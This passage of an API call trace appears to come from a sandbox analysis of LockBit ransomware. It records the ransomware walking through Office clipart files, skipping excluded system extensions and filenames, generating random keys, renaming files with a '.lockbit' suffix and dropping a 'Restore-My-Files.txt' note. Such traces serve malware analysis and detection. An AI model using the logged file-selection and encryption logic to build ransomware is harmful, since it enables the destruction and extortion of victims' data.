office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.788] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1664, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03464_.WMF", cAlternateFileName="")) returned 1 [0167.788] lstrcmpiW (lpString1=".", lpString2="PE03464_.WMF") returned -1 [0167.788] lstrcmpiW (lpString1="..", lpString2="PE03464_.WMF") returned -1 [0167.788] PathFindExtensionW (pszPath="PE03464_.WMF") returned=".WMF" [0167.788] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.788] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.788] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.788] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.788] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.788] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.788] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.788] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.789] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.789] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03464_.WMF") returned 1 [0167.790] lstrcmpiW (lpString1="ntldr", lpString2="PE03464_.WMF") returned -1 [0167.790] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03464_.WMF") returned -1 [0167.790] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03464_.WMF") returned -1 [0167.790] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03464_.WMF") returned -1 [0167.790] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03464_.WMF") returned 1 [0167.790] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03464_.WMF") returned -1 [0167.790] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.790] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03464_.WMF") returned=".WMF" [0167.790] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.790] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.790] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.791] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.791] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03464_.WMF.lockbit") returned 72 [0167.791] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03464_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03464_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.792] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.793] malloc (_Size=0x40068) returned 0x3df0008 [0167.793] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5732) returned 1 [0167.793] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.793] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.794] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.794] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.796] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03464_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03464_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.796] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.796] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.797] free (_Block=0x1fa2ed8) [0167.797] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03464_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.797] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.797] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.797] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x41a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03466_.WMF", cAlternateFileName="")) returned 1 [0167.797] lstrcmpiW (lpString1=".", lpString2="PE03466_.WMF") returned -1 [0167.797] lstrcmpiW (lpString1="..", lpString2="PE03466_.WMF") returned -1 [0167.797] PathFindExtensionW (pszPath="PE03466_.WMF") returned=".WMF" [0167.797] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.797] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.797] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.797] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.798] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.798] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.799] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03466_.WMF") returned 1 [0167.799] lstrcmpiW (lpString1="ntldr", lpString2="PE03466_.WMF") returned -1 [0167.799] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03466_.WMF") returned -1 [0167.799] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03466_.WMF") returned -1 [0167.799] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03466_.WMF") returned -1 [0167.799] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03466_.WMF") returned 1 [0167.799] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03466_.WMF") returned -1 [0167.800] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.800] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03466_.WMF") returned=".WMF" [0167.800] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.800] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.800] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.801] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.801] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.801] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.801] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.801] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.801] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.801] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03466_.WMF.lockbit") returned 72 [0167.801] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03466_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03466_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0167.802] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.802] malloc (_Size=0x40068) returned 0x1ff1e60 [0167.802] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=16800) returned 1 [0167.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0167.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0167.803] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0167.808] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03466_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03466_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.808] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.808] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.809] free (_Block=0x1fa2ed8) [0167.809] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03466_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.809] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.810] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.810] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3998, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03470_.WMF", cAlternateFileName="")) returned 1 [0167.810] lstrcmpiW (lpString1=".", lpString2="PE03470_.WMF") returned -1 [0167.810] lstrcmpiW (lpString1="..", lpString2="PE03470_.WMF") returned -1 [0167.810] PathFindExtensionW (pszPath="PE03470_.WMF") returned=".WMF" [0167.810] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.810] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.811] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.811] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.812] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE03470_.WMF") returned 1 [0167.812] lstrcmpiW (lpString1="ntldr", lpString2="PE03470_.WMF") returned -1 [0167.812] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE03470_.WMF") returned -1 [0167.812] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE03470_.WMF") returned -1 [0167.812] lstrcmpiW (lpString1="autorun.inf", lpString2="PE03470_.WMF") returned -1 [0167.812] lstrcmpiW (lpString1="thumbs.db", lpString2="PE03470_.WMF") returned 1 [0167.812] lstrcmpiW (lpString1="iconcache.db", lpString2="PE03470_.WMF") returned -1 [0167.812] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.813] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03470_.WMF") returned=".WMF" [0167.813] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.813] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.813] lstrcmpiW 